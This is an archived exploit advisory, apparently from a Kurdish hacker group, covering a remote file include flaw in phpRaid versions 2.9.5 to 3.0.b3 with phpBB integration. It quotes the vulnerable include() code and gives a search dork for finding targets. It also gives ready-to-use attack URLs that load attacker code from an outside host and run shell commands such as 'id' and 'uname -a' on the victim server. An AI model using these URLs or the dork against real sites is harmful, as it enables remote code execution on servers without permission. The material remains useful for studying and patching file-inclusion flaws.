TUCoPS :: Web :: PHP :: b06-2075.htm

phpRaid Remote File Include Vulnerability (PHPBB)
phpRaid Remote File Include Vulnerability (PHPBB)
phpRaid Remote File Include Vulnerability (PHPBB)



# Kurdish Security Advisory =0D
# phpRaid Remote File Include [PHPBB] :}=0D
# "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan=0D
# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org=0D 
=0D
# Script : phpRaid =0D
# Script Website : http://www.spiffyjr.com/=0D 
# Version : phpRaid v2.9.5=0D
" v3.0.b1=0D
" v3.0.b2=0D
" v3.0.b3=0D
=0D
# Risk : High=0D
# Class : Remote=0D
# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D =0D
# Special Bastard : Turkish Lame=0D
=0D
# w0rkz : "phpRaid" "inurl:"phpRaid" etc. :)=0D
=0D
---------------------------------------------------------------------=0D
=0D
# cmd shell example: =0D
# cmd shell variable: ($_GET[cmd]);=0D
=0D
Vulnerable code : At first for phpbb portal :)=0D
=0D
=0D
}=0D
?>=0D
// define our auth type=0D
define("AUTH","phpbb");=0D
=0D
// database connection=0D
global $user_group_table;=0D
$user_group_table = $phpbb_prefix . "user_group";=0D
=0D
// setup phpBB user integration=0D
define('IN_PHPBB', true);=0D
=0D
// set this as the path to your phpBB installation=0D
include($phpbb_root_path . 'extension.inc');=0D
include($phpbb_root_path . 'common.'.$phpEx);=0D
=0D
-----------------------------------------------------------------=0D
=0D
http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=id=0D 
=0D
http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH